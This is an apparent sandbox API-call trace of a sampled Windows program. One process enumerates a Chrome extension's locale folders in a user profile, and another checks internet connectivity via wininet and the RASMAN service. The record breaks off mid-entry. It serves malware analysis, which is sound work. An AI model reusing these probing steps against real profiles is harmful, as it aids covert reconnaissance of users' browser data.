| 07:44:12,312 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\xb8\xa5j\xe0\x91\xcf\x01\xd0d\xcaj\xe0\x91\xcf\x01\x80?\xa7j\xe0\x91\xcf\x01\x80?\xa7j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80?\xa7j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\xdd\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:12,312 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:12,312 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:12,392 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\hi\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:12,392 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80?\xa7j\xe0\x91\xcf\x01\xa0\xdd\xc8j\xe0\x91\xcf\x01\x80?\xa7j\xe0\x91\xcf\x01\x80?\xa7j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80?\xa7j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\x17\x01\x00\x00\x00\x00\x00\x00\x18\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:12,392 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:12,392 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:12,472 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\hu\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:12,472 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\xc6\xa8j\xe0\x91\xcf\x01\xa0\xdd\xc8j\xe0\x91\xcf\x01\xb0\xc6\xa8j\xe0\x91\xcf\x01\xb0\xc6\xa8j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\xc6\xa8j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\xeb\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:12,472 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:12,472 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:12,553 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\id\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:12,553 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0M\xaaj\xe0\x91\xcf\x01\xa0\xdd\xc8j\xe0\x91\xcf\x01\xe0M\xaaj\xe0\x91\xcf\x01\xe0M\xaaj\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0M\xaaj\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01\xd1\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:12,553 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:12,553 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:12,633 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\it\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:12,633 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0M\xaaj\xe0\x91\xcf\x01\xa0\xdd\xc8j\xe0\x91\xcf\x01\xe0M\xaaj\xe0\x91\xcf\x01\xe0M\xaaj\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0M\xaaj\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01\xd5\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:12,633 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:12,633 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:12,713 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\ja\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:12,713 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xd5\xabj\xe0\x91\xcf\x01\xa0\xdd\xc8j\xe0\x91\xcf\x01\x10\xd5\xabj\xe0\x91\xcf\x01\x10\xd5\xabj\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xd5\xabj\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01\xdd\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:12,713 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:12,713 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:12,773 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:12,773 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:12,773 | 1308 | RegQueryValueExA |
Handle => 0x00000140 Data => 0 ValueName => EnableFileTracing |
SUCCESS | 0x00000000 | |
| 07:44:12,773 | 1308 | RegQueryValueExA |
Handle => 0x00000140 Data => 4294901760 ValueName => FileTracingMask |
SUCCESS | 0x00000000 | |
| 07:44:12,773 | 1308 | RegQueryValueExA |
Handle => 0x00000140 Data => 0 ValueName => EnableConsoleTracing |
SUCCESS | 0x00000000 | |
| 07:44:12,773 | 1308 | RegQueryValueExA |
Handle => 0x00000140 Data => 4294901760 ValueName => ConsoleTracingMask |
SUCCESS | 0x00000000 | |
| 07:44:12,773 | 1308 | RegQueryValueExA |
Handle => 0x00000140 Data => 1048576 ValueName => MaxFileSize |
SUCCESS | 0x00000000 | |
| 07:44:12,773 | 1308 | RegQueryValueExA |
Handle => 0x00000140 Data => %windir%\tracing\x00 ValueName => FileDirectory |
SUCCESS | 0x00000000 | |
| 07:44:12,773 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x0016a080 | |
| 07:44:12,783 | 1308 | OpenServiceW |
ServiceControlManager => 0x0016a080 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x00172d28 | |
| 07:44:12,783 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:12,783 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:12,783 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:12,793 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\ko\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:12,793 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xd5\xabj\xe0\x91\xcf\x01\xa0\xdd\xc8j\xe0\x91\xcf\x01\x10\xd5\xabj\xe0\x91\xcf\x01\x10\xd5\xabj\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xd5\xabj\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01\xda\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:12,793 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:12,793 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:12,873 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\lt\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:12,873 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\\xadj\xe0\x91\xcf\x01\xa0\xdd\xc8j\xe0\x91\xcf\x01@\\xadj\xe0\x91\xcf\x01@\\xadj\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\\xadj\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01\xe4\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:12,873 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:12,873 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:12,953 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\lv\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:12,953 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\\xadj\xe0\x91\xcf\x01\xa0\xdd\xc8j\xe0\x91\xcf\x01p\xe3\xaej\xe0\x91\xcf\x01p\xe3\xaej\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\xe3\xaej\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01\xe0\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:12,953 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:12,953 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:13,033 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\ms\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:13,033 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\xe3\xaej\xe0\x91\xcf\x01\xa0\xdd\xc8j\xe0\x91\xcf\x01p\xe3\xaej\xe0\x91\xcf\x01p\xe3\xaej\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\xe3\xaej\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01\xcf\x00\x00\x00\x00\x00\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:13,033 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:13,033 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:13,213 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\nl\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:13,223 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0j\xb0j\xe0\x91\xcf\x01\xa0\xdd\xc8j\xe0\x91\xcf\x01\xa0j\xb0j\xe0\x91\xcf\x01\xa0j\xb0j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0j\xb0j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01\xd9\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:13,223 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:13,223 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:13,304 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\no\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:13,304 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0j\xb0j\xe0\x91\xcf\x01\xa0\xdd\xc8j\xe0\x91\xcf\x01\xa0j\xb0j\xe0\x91\xcf\x01\xa0j\xb0j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0j\xb0j\xe0\x91\xcf\x01\xe8\x8a\xb1j\xe0\x91\xcf\x01\x00\xb6j\x16\x7f\x91\xcf\x01\xa0j\xb0j\xe0\x91\xcf\x01\xc3\x00\x00\x00\x00\x00\x00\x00\xc8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:13,304 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:13,304 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:13,384 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\pl\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:13,384 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0j\xb0j\xe0\x91\xcf\x01\xa0\xdd\xc8j\xe0\x91\xcf\x01\xd0\xf1\xb1j\xe0\x91\xcf\x01\xd0\xf1\xb1j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\xf1\xb1j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01\xd5\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:13,384 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:13,384 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:13,464 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\pt_BR\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:13,464 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0\xf1\xb1j\xe0\x91\xcf\x01\xa0\xdd\xc8j\xe0\x91\xcf\x01\xd0\xf1\xb1j\xe0\x91\xcf\x01\xd0\xf1\xb1j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\xf1\xb1j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01\xce\x00\x00\x00\x00\x00\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:13,464 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:13,464 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:13,544 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\pt_PT\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:13,544 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00y\xb3j\xe0\x91\xcf\x01\xa0\xdd\xc8j\xe0\x91\xcf\x01\x00y\xb3j\xe0\x91\xcf\x01\x00y\xb3j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00y\xb3j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01P\x9e\xd6j\xe0\x91\xcf\x01\xd0\x00\x00\x00\x00\x00\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00 